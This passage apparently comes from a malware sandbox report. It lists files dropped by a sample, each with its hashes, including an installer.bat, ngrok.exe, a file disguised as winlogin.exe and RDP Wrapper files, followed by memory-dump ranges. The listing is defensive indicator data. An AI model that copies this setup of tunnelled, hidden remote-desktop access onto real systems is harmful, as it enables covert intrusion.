                                                                                                                                                                          8cb7f4b4ab204cacd1af6b29c2a2042c

                                                                                                                                                                          SHA1

                                                                                                                                                                          244540c38e33eac05826d54282a0bfa60340d6a1

                                                                                                                                                                          SHA256

                                                                                                                                                                          4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6

                                                                                                                                                                          SHA512

                                                                                                                                                                          7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                          Filesize

                                                                                                                                                                          944B

                                                                                                                                                                          MD5

                                                                                                                                                                          190b28f40c0edd3cc08d0fd3aca4779a

                                                                                                                                                                          SHA1

                                                                                                                                                                          425b98532b6a18aa2baece47605f1cf6c8cfbd11

                                                                                                                                                                          SHA256

                                                                                                                                                                          8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce

                                                                                                                                                                          SHA512

                                                                                                                                                                          8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                          Filesize

                                                                                                                                                                          944B

                                                                                                                                                                          MD5

                                                                                                                                                                          7724e6b4d505d65fa121e9860354d7fd

                                                                                                                                                                          SHA1

                                                                                                                                                                          afa9f041e55ede89f1e83efbbf282417ebb6f129

                                                                                                                                                                          SHA256

                                                                                                                                                                          d6745a744ef70e52d29fab8bcb0fc8e89f49f1eb3984cbce1b86165c203f7dda

                                                                                                                                                                          SHA512

                                                                                                                                                                          670c60345d46105da54fad6e939c56bb2965c6a0c5039e8ebd8deca64ccdd54925e47e533896a40ca35e093c36d30bb56a335479a3e2e0a03ec09768127bd380

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_deuifnwg.mdq.ps1

                                                                                                                                                                          Filesize

                                                                                                                                                                          60B

                                                                                                                                                                          MD5

                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                          SHA1

                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                          SHA256

                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                          SHA512

                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                        • C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\1847AE59126C78560ED59F49F6BC56F9B9A6BC21

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          5eb50639ea52a365e36575a533bcd3ed

                                                                                                                                                                          SHA1

                                                                                                                                                                          05ff7ce04ff17a94aefaf329970effc47a5e0e17

                                                                                                                                                                          SHA256

                                                                                                                                                                          47495bf79d7316755d22a64a825509b724b7a0c95d9d9ed8b4be6a6456b38058

                                                                                                                                                                          SHA512

                                                                                                                                                                          63e8aa3858eb48756bfe6801e31b29c5f44ef12f70b15520de280978d13af1757c8cd3b8052cf69258b2903fa49e950a91c2b7f88f268c5093a85eb40d76d99b

                                                                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\66BF9BC704CBEB0256E1FFA67DB9ABF88051690C

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          2a5ff01c155f031572213298385e203a

                                                                                                                                                                          SHA1

                                                                                                                                                                          36f64848d248f669ae024815525c06d3ac6aac91

                                                                                                                                                                          SHA256

                                                                                                                                                                          38efbd7755d1b1261bb1e3ef8ff4af2f39a2d9582cce4549a6098b6f34c69a22

                                                                                                                                                                          SHA512

                                                                                                                                                                          2e6626eccf9ff0c098fc075542c8540880661a95e95ba11f35ee5576d29a9f469e155d9c184456a5fb1e2582004a7053b898f5643967e9c6b796a3f81fcae8ba

                                                                                                                                                                        • C:\programdata\Windata\installer.bat

                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          895d7ba924e93cefffa7fa4bc0cac6f2

                                                                                                                                                                          SHA1

                                                                                                                                                                          68313bc29146cd23caf4dded3100225d4d0f26a6

                                                                                                                                                                          SHA256

                                                                                                                                                                          c24c176aab99728a62179a4eb95af90f80e48c59884e258d8c454de26bfa2dd8

                                                                                                                                                                          SHA512

                                                                                                                                                                          aaf1c5c43937a42bd1eb49df5ac6a2a76ea2c9f0c74cb52ca7ac6f332aa191b99a50fdf31ef97a0a6b995c0f187c15cd2cdce925b368926dba8190073f20f450

                                                                                                                                                                        • C:\programdata\Windata\ngrok.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          23.8MB

                                                                                                                                                                          MD5

                                                                                                                                                                          e2eadf60d8f25cae9b29decab461177b

                                                                                                                                                                          SHA1

                                                                                                                                                                          cecc54143cc375af1b9aed0021643b179574e592

                                                                                                                                                                          SHA256

                                                                                                                                                                          1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386

                                                                                                                                                                          SHA512

                                                                                                                                                                          b196ee33855a41c9888420410f55c06b6650c0680210c29075bdf0c09054ce3fa46af10163332715af0dae7a3eb1cb6c5d80cb604ca67f4c32934b8f17361c1f

                                                                                                                                                                        • C:\programdata\Windata\winlogin.exe

                                                                                                                                                                          Filesize

                                                                                                                                                                          7KB

                                                                                                                                                                          MD5

                                                                                                                                                                          9e497a3855c86b45e07ed23710683de1

                                                                                                                                                                          SHA1

                                                                                                                                                                          c9baae1a87fef165e9942119fb19631a2cbda8d8

                                                                                                                                                                          SHA256

                                                                                                                                                                          54b9b8048365c9705d5b39c638c7ce5599a93685b2a44020ede883185409bb9f

                                                                                                                                                                          SHA512

                                                                                                                                                                          da79293ea0a508ea3db40d6041d4d3d414772e32962eaae627e4a750b21872bb50a930bd6c97da86c18cd060e6fd9c3b746e396141ba7b1e38ca8596c5ed84b6

                                                                                                                                                                        • \??\c:\program files\rdp wrapper\rdpwrap.dll

                                                                                                                                                                          Filesize

                                                                                                                                                                          114KB

                                                                                                                                                                          MD5

                                                                                                                                                                          461ade40b800ae80a40985594e1ac236

                                                                                                                                                                          SHA1

                                                                                                                                                                          b3892eef846c044a2b0785d54a432b3e93a968c8

                                                                                                                                                                          SHA256

                                                                                                                                                                          798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                                                                                                                                          SHA512

                                                                                                                                                                          421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                                                                                                                                        • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                                                                                                                                                          Filesize

                                                                                                                                                                          128KB

                                                                                                                                                                          MD5

                                                                                                                                                                          dddd741ab677bdac8dcd4fa0dda05da2

                                                                                                                                                                          SHA1

                                                                                                                                                                          69d328c70046029a1866fd440c3e4a63563200f9

                                                                                                                                                                          SHA256

                                                                                                                                                                          7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

                                                                                                                                                                          SHA512

                                                                                                                                                                          6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

                                                                                                                                                                        • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                                                                                                                                                          Filesize

                                                                                                                                                                          137KB

                                                                                                                                                                          MD5

                                                                                                                                                                          d6801fc820bf493f5ccbc61145b0841f

                                                                                                                                                                          SHA1

                                                                                                                                                                          037c8d16fcdff9a0ef3136148b3fa02ef9f35f36

                                                                                                                                                                          SHA256

                                                                                                                                                                          fd4499c428c8db74193b78c0847bce152c79f4800a73da6618b6c45489c58033

                                                                                                                                                                          SHA512

                                                                                                                                                                          7c2c047a4c817c3b5db69e2b617060722e7241ef290d77554309c91c8be8de3a6b5f5b0aa2c5c8ba286acfe30486f16b11f0fcd05e3d0960d2712787ddd79171

                                                                                                                                                                        • memory/776-381-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/1240-391-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/1868-230-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/2156-396-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/2416-411-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/2968-347-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/4280-325-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/5036-335-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/5332-12-0x00007FFB24D70000-0x00007FFB25832000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/5332-9-0x0000012E66130000-0x0000012E66152000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          136KB

                                                                                                                                                                        • memory/5332-11-0x00007FFB24D70000-0x00007FFB25832000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/5332-10-0x00007FFB24D70000-0x00007FFB25832000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/5332-15-0x00007FFB24D70000-0x00007FFB25832000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/5332-0-0x00007FFB24D73000-0x00007FFB24D75000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          8KB

                                                                                                                                                                        • memory/5692-374-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/5708-405-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/6000-356-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          1.4MB

                                                                                                                                                                        • memory/6024-158-0x000001ADD9AD0000-0x000001ADD9ADA000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          40KB

                                                                                                                                                                        • memory/6024-157-0x000001ADD9AF0000-0x000001ADD9B02000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          72KB

                                                                                                                                                                        • memory/6124-16-0x0000000000860000-0x0000000000C2D000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          3.8MB

                                                                                                                                                                        • memory/6124-20-0x0000000000860000-0x0000000000C2D000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          3.8MB